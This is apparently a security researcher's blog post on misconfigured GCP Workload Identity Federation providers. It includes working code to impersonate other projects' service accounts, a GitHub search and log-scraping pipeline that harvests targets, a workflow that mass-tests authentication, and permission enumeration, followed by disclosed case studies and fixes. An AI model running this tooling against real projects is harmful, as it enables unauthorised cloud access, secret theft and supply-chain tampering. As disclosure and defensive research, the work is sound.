Previous Findings
A few years ago I wrote about how misconfigured GCP Workload Identity Federation providers could allow any GitHub Actions workflow to authenticate as someone else's service account. Out of 30 repositories I checked manually, 6 were vulnerable, and it made me wonder how many more I'd find if I actually went looking properly.
Recap: What's Still Exposed
First, a quick recap of the issue. The modern way to connect GitHub Actions to GCP is the OIDC connector, which avoids generating service account credentials and dealing with rotating them, storing them securely, and so on. Instead, the OIDC connector creates short-lived credentials that are tied to a specific workflow run and expire shortly after, so the window to do anything with them is small.
Many of the guides online miss a crucial configuration step, and originally it wasn't obvious in Google's own documentation either.
If you don't add conditions to the workload identity provider restricting its scope to a specific org, repo or workflow, ANY GitHub Actions workflow can use the provider.
The values used in the GitHub Action are often not stored as secrets, because technically they aren't secrets, and many guides even reinforce that. This makes it trivial to configure your own GitHub Action targeting the same provider.
The workflow file leaks everything an attacker needs:
- uses: google-github-actions/auth@v2
  with:
    workload_identity_provider: 'projects/123456789012/locations/global/workloadIdentityPools/github-actions-idp/providers/github-actions-idp'
    service_account: 'deploy@example.iam.gserviceaccount.com'

Both values are in a public .github/workflows/ file. The provider path contains the GCP project number. Without an attribute_condition on the provider, those two strings are all you need to authenticate as that service account from any repo on GitHub.
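To make that concrete: the auth action is just performing a standard OIDC token exchange, which you can reproduce directly. Here is a minimal sketch of the three calls involved, assuming it runs inside a workflow with id-token: write and reusing the example provider and service account from the snippet above:

import os
import requests

# Reusing the example values from the leaked workflow above.
PROVIDER = "projects/123456789012/locations/global/workloadIdentityPools/github-actions-idp/providers/github-actions-idp"
SERVICE_ACCOUNT = "deploy@example.iam.gserviceaccount.com"

# 1. Ask GitHub for an OIDC token. These env vars exist in any job
#    that has the `id-token: write` permission.
github_jwt = requests.get(
    os.environ["ACTIONS_ID_TOKEN_REQUEST_URL"],
    params={"audience": f"https://iam.googleapis.com/{PROVIDER}"},
    headers={"Authorization": f"Bearer {os.environ['ACTIONS_ID_TOKEN_REQUEST_TOKEN']}"},
).json()["value"]

# 2. Exchange it at Google's STS endpoint for a federated token.
#    Without an attribute condition, the provider accepts this JWT
#    no matter which repository ran the workflow.
federated = requests.post(
    "https://sts.googleapis.com/v1/token",
    data={
        "grant_type": "urn:ietf:params:oauth:grant-type:token-exchange",
        "audience": f"//iam.googleapis.com/{PROVIDER}",
        "scope": "https://www.googleapis.com/auth/cloud-platform",
        "requested_token_type": "urn:ietf:params:oauth:token-type:access_token",
        "subject_token_type": "urn:ietf:params:oauth:token-type:jwt",
        "subject_token": github_jwt,
    },
).json()["access_token"]

# 3. Use the federated token to impersonate the service account.
access_token = requests.post(
    f"https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/{SERVICE_ACCOUNT}:generateAccessToken",
    headers={"Authorization": f"Bearer {federated}"},
    json={"scope": ["https://www.googleapis.com/auth/cloud-platform"]},
).json()["accessToken"]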
You can check whether your own provider is misconfigured:
gcloud iam workload-identity-pools providers describe PROVIDER_ID \
--workload-identity-pool=POOL_ID \
--location=global \
--format="value(attributeCondition)"
# Empty output = vulnerable

Building the Search Pipeline
GitHub Code Search is the starting point, but it caps results at 1,000 per query, so first I needed a way around that. There are other code search platforms online, but some were paid and others just weren't returning the results I wanted. The base query:
"workload_identity_provider" "projects/" path:.github/workflows language:YAML
A single query returns around 500 unique repos. To get past the cap, I sharded the queries on different parameters, for example the GitHub Action version or the first digit of the GCP project number.
# Version shards — older versions are where the unmaintained repos live
queries = [
    '"google-github-actions/auth@v0" "workload_identity_provider"',
    '"google-github-actions/auth@v1" "workload_identity_provider"',
    '"google-github-actions/auth@v2" "workload_identity_provider"',
    '"google-github-actions/auth@v3" "workload_identity_provider"',
]

# Project number digit shards — catches everything regardless of pool/provider naming
for digit in range(0, 10):
    queries.append(
        f'"workload_identity_provider" "projects/{digit}" path:.github/workflows'
    )
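Each shard then gets paged through the search API. A rough sketch of the harvesting loop; the endpoint, per_page limit and 403 rate-limit behaviour are GitHub's documented code search API, but the back-off here is deliberately simplistic:

import time
import requests

def search_code(query, token):
    """Collect repo names for one sharded code search query."""
    repos = set()
    page = 1
    while page <= 10:  # 100 results per page, 1,000-result cap per query
        resp = requests.get(
            "https://api.github.com/search/code",
            params={"q": query, "per_page": 100, "page": page},
            headers={
                "Authorization": f"Bearer {token}",
                "Accept": "application/vnd.github+json",
            },
        )
        if resp.status_code == 403:
            time.sleep(60)  # secondary rate limit; back off and retry the page
            continue
        items = resp.json().get("items", [])
        if not items:
            break
        repos.update(item["repository"]["full_name"] for item in items)
        page += 1
    return repos

all_repos = set()
for query in queries:
    all_repos |= search_code(query, token="ghp_...")  # your PAT here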
Some repos store the provider path in a GitHub Actions variable rather than hardcoding it. The YAML won't contain the provider path, but GHA expands variables in plain text in the workflow run logs, so it's still possible to extract them by downloading the logs via the API.
import io
import re
import zipfile

import requests

PROVIDER_RE = re.compile(
    r"projects/\d+/locations/global/workloadIdentityPools/[^/]+/providers/\S+"
)

def extract_from_logs(owner, repo, token):
    """Pull the WIF provider path out of a repo's recent workflow run logs."""
    headers = {"Authorization": f"Bearer {token}"}
    runs = requests.get(
        f"https://api.github.com/repos/{owner}/{repo}/actions/runs",
        headers=headers,
    ).json().get("workflow_runs", [])
    for run in runs[:5]:  # recent runs are enough; the value rarely changes
        logs_url = f"https://api.github.com/repos/{owner}/{repo}/actions/runs/{run['id']}/logs"
        r = requests.get(logs_url, headers=headers)  # redirects to a zip of logs
        if r.status_code != 200:
            continue  # logs expired or inaccessible
        with zipfile.ZipFile(io.BytesIO(r.content)) as z:
            for name in z.namelist():
                content = z.read(name).decode("utf-8", errors="ignore")
                match = PROVIDER_RE.search(content)
                if match:
                    return match.group(0)
    return None

Across multiple sharding passes, this brought the total to 4,565 unique repositories with WIF configured.
Verifying at Scale
Manually checking 4,565 repos isn't feasible. Instead, I built a GitHub Actions workflow that uses a matrix to attempt authentication against each extracted provider/service account pair and records whether it succeeds:
jobs:
  verify:
    needs: load  # the load job emits the JSON list of targets
    strategy:
      fail-fast: false
      matrix:
        target: ${{ fromJson(needs.load.outputs.targets) }}
    runs-on: ubuntu-latest
    permissions:
      id-token: write
      contents: read
    steps:
      - name: Attempt WIF authentication
        id: auth
        uses: google-github-actions/auth@v2
        with:
          workload_identity_provider: ${{ matrix.target.provider }}
          service_account: ${{ matrix.target.service_account }}
          token_format: access_token
        continue-on-error: true
      - name: Record result
        run: |
          echo "${{ matrix.target.repo }},${{ steps.auth.outcome }}" >> results.csv
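The load job that feeds the matrix isn't shown above; it reads the extracted pairs and exposes them as a JSON job output. One practical wrinkle: GitHub caps a single matrix at 256 jobs, so thousands of targets have to be chunked across runs. A sketch of how that output could be built (the targets.csv name and the chunk-index scheme are my own illustration, not the exact pipeline):

import csv
import json
import sys

MATRIX_LIMIT = 256  # GitHub Actions caps a matrix at 256 jobs per run

def load_targets(path, chunk_index):
    """Read extracted (repo, provider, service_account) rows and emit one
    matrix-sized chunk as the JSON that fromJson() expects."""
    with open(path, newline="") as f:
        rows = [
            {"repo": r["repo"],
             "provider": r["provider"],
             "service_account": r["service_account"]}
            for r in csv.DictReader(f)
        ]
    start = chunk_index * MATRIX_LIMIT
    return rows[start:start + MATRIX_LIMIT]

if __name__ == "__main__":
    chunk = load_targets("targets.csv", int(sys.argv[1]))
    # Written to $GITHUB_OUTPUT as `targets=...` by the load job.
    print(f"targets={json.dumps(chunk)}")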
Out of the repos that had extractable provider properties, 63 were confirmed vulnerable: the WIF provider accepted the token from a GitHub repository entirely outside their organisation.
Proving Impact
Confirming authentication was just the first step. Being able to connect to a GCP project from an unrelated repository is a misconfiguration, but on its own it doesn't tell you much; what matters is what you can actually do once you're in. For each vulnerable provider I used GCP's testIamPermissions API to check a broad list of permissions in a single request, then used those results to enumerate whatever resources were accessible.
- name: Test IAM permissions
  run: |
    PROJECT="${{ inputs.project_id }}"
    TOKEN="${{ steps.auth.outputs.access_token }}"
    PERMS='{
      "permissions": [
        "compute.instances.list", "compute.instances.create", "compute.instances.delete",
        "run.services.create", "run.services.delete",
        "cloudfunctions.functions.create",
        "secretmanager.versions.access",
        "storage.objects.get", "storage.objects.create", "storage.objects.delete",
        "artifactregistry.repositories.uploadArtifacts",
        "artifactregistry.repositories.downloadArtifacts",
        "iam.serviceAccounts.list", "resourcemanager.projects.getIamPolicy",
        "container.clusters.list", "bigquery.datasets.get"
      ]
    }'
    curl -s -X POST \
      "https://cloudresourcemanager.googleapis.com/v1/projects/${PROJECT}:testIamPermissions" \
      -H "Authorization: Bearer ${TOKEN}" \
      -H "Content-Type: application/json" \
      -d "$PERMS" | jq -r '.permissions[]' | sort

- name: Enumerate resources
  run: |
    # Shell variables don't carry across steps, so re-read the project ID here.
    PROJECT="${{ inputs.project_id }}"
    gcloud compute instances list --project=$PROJECT --format=json
    gcloud secrets list --project=$PROJECT --format=json
    gcloud artifacts repositories list --project=$PROJECT --format=json
    gcloud run services list --project=$PROJECT --format=json
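To sort 63 results into "interesting" and "not", I bucketed each account by the permissions the previous step confirmed. The buckets below are illustrative rather than the precise criteria I used:

# Hypothetical triage: classify each target by the most dangerous
# permission the testIamPermissions call confirmed.
HIGH_IMPACT = {
    "compute.instances.create", "compute.instances.delete",
    "run.services.create", "cloudfunctions.functions.create",
    "secretmanager.versions.access",
    "artifactregistry.repositories.uploadArtifacts",
    "storage.objects.create", "storage.objects.delete",
}

def triage(confirmed_permissions):
    """Return a severity bucket for one service account's confirmed perms."""
    granted = set(confirmed_permissions)
    if granted & HIGH_IMPACT:
        return "severe"      # code execution, secret access, or supply chain
    if granted:
        return "limited"     # read-only access to some resources
    return "authn-only"      # authenticates but can't do anything useful

print(triage(["storage.objects.get", "secretmanager.versions.access"]))  # severe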
The permissions varied widely across the 63 vulnerable accounts. Many had read-only access to a handful of storage buckets or Cloud Run services: real misconfigurations, but limited in what an attacker could actually do with them. There were plenty of other cases that were much more severe, though.
What I Found
A UK-based online travel company
Their CI/CD service account had artifactregistry.repositories.downloadArtifacts on a registry containing 866 Docker images. A lot of these were copies of public images used as part of their build tooling, but a significant subset were proprietary microservices. I pulled one of those from an unrelated GitHub repository and the image contained JavaScript source maps that would allow full reconstruction of the original source code. The eu.gcr.io repository alone was 12.7 TB. The registry also contained Maven snapshots (2 TB), npm packages, and build artefacts for payment processing, booking engine, and third-party integrations.
Confirmed permissions:
artifactregistry.repositories.downloadArtifacts
artifactregistry.dockerimages.get / list
artifactregistry.packages.get / list
storage.objects.create / get / list
resourcemanager.projects.get
Registry: eu.gcr.io — 12.7 TB, 866 images (selected proprietary)
b*****g-service p*****t-service c*****t-service
a*****s-ticketing-service f*****b-service c*****r-account-service
b*****g-engine s*****h-service q*****d-service
a*****t-service c*****n-service j*****y-service
v*****d-service p*****n-service p*****t-hub
... and ~850 more
maven-snapshots — 2 TB
remote-dockerhub — 70 GB (pull-through cache)
I submitted this through their bug bounty programme and they were excellent to work with. They responded quickly, took it seriously and even added a $500 bonus on top of the bounty, bringing the total payout to $3,500.
A blockchain network's testnet infrastructure
This one had 30 confirmed permissions, the broadest attack surface of any account in the dataset. The service account could create and delete Compute Engine VMs, deploy arbitrary Cloud Run services and Cloud Functions, read Secret Manager values, and write to storage. There were 7 running VMs at the time of discovery, including GKE node pool instances across two regions and a bastion host.
Confirmed permissions (selected):
compute.instances.create / delete / list ← spin up miners or destroy the testnet
cloudfunctions.functions.create ← deploy arbitrary code
run.services.create / delete
secretmanager.versions.access ← read all secrets (validator keys, API creds)
storage.objects.create / get / delete
artifactregistry.repositories.uploadArtifacts
resourcemanager.projects.getIamPolicy ← read IAM bindings for escalation
Running VMs:
gke-g*****h-testnet-m-g*****d-******2b-**** (us-central1-a, e2-standard-4)
gke-g*****h-testnet-m-g*****d-******2b-**** (us-central1-a, e2-standard-4)
gke-g*****h-testnet-m-g*****d-******2b-**** (us-central1-a, e2-standard-4)
gke-g*****h-testnet-m-g*****d-******2b-**** (us-central1-a, e2-standard-4)
g*****h-bastion-host (us-central1-a, f1-micro)
gke-g*****h-testnet-a-g*****d-******39-**** (asia-southeast1-a, e2-standard-4)
gke-g*****h-testnet-a-g*****d-******39-**** (asia-southeast1-a, e2-standard-4)
For a blockchain network this is particularly sensitive. The secretmanager.versions.access permission likely covers validator keys and infrastructure credentials. compute.instances.create on the same machine types already running in the project would allow an attacker to run cryptocurrency miners at the target's expense.
An NIH-funded biomedical research institution
The exposed service account had artifactregistry.repositories.uploadArtifacts. This is an NIH-funded research project that publishes open-source tools used by research institutions worldwide. The concern here wasn't data access, it was supply chain. A malicious package pushed to their registry could end up in research pipelines globally before anyone noticed. There were also 5 running Compute Engine VMs including a disease variant prioritisation service and an ontology lookup system.
Confirmed permissions:
artifactregistry.repositories.uploadArtifacts ← push malicious packages
artifactregistry.repositories.list
compute.instances.list
compute.disks.list
resourcemanager.projects.get
Running VMs:
m*****r-exomiser (disease variant prioritisation, 4 vCPU / 12 GB)
m*****r-ols4 (ontology lookup service)
data-proxy (knowledge graph data proxy)
jenkins-server-vm (CI/CD server)
m*****r-gh-issues-redis (Redis)
The institution's cybersecurity team were very quick to respond and resolve the issue. They were also happy for this to be included as a case study in this post.
The owners of all the other vulnerable repositories I found were also notified. That included a number of students who were happy to learn from the misconfiguration, which was a nice outcome.
The Fix
Lock the provider to a specific repository:
resource "google_iam_workload_identity_pool_provider" "github" {
  # ... existing config ...

  # Lock to a specific repo:
  attribute_condition = "assertion.repository == 'my-org/my-repo'"

  # Or lock to your org (allows all repos under the org):
  # attribute_condition = "assertion.repository_owner == 'my-org'"
}
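If you run more than a handful of projects, it's worth sweeping them all rather than checking providers one at a time. A small sketch that wraps the same gcloud commands used earlier; the hard-coded project list is a placeholder for however you enumerate your projects:

import json
import subprocess

def gcloud_json(*args):
    """Run a gcloud command and parse its JSON output."""
    out = subprocess.run(
        ["gcloud", *args, "--format=json"],
        capture_output=True, text=True, check=True,
    ).stdout
    return json.loads(out or "[]")

def audit_project(project):
    """Flag every WIF provider in a project with no attribute condition."""
    pools = gcloud_json(
        "iam", "workload-identity-pools", "list",
        "--location=global", f"--project={project}",
    )
    for pool in pools:
        pool_id = pool["name"].split("/")[-1]
        providers = gcloud_json(
            "iam", "workload-identity-pools", "providers", "list",
            f"--workload-identity-pool={pool_id}",
            "--location=global", f"--project={project}",
        )
        for p in providers:
            if not p.get("attributeCondition"):
                print(f"VULNERABLE: {p['name']}")

for project in ["my-project-1", "my-project-2"]:  # your project IDs here
    audit_project(project)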
A Note on AWS

Something worth pointing out is that I didn't find the same issue at scale with AWS. I don't think that's because AWS users are more security-conscious. The difference comes down to documentation. AWS makes it explicit in their OIDC guides that you need to scope the trust policy to a specific repo or org, and the examples show that clearly. GCP's documentation gave the impression that just setting up the provider was enough and that the credential-less approach was inherently secure. If you didn't already understand how OIDC trust actually works, it was easy to follow the guide, have everything working, and have no idea you'd left the door open to anyone on GitHub.
A few years passed between the first post and this one, but I think the time was well spent. The issues are still out there, and this time around the work demonstrated that they can have real impact: not just misconfigured student projects, but production infrastructure at companies and research institutions that people rely on.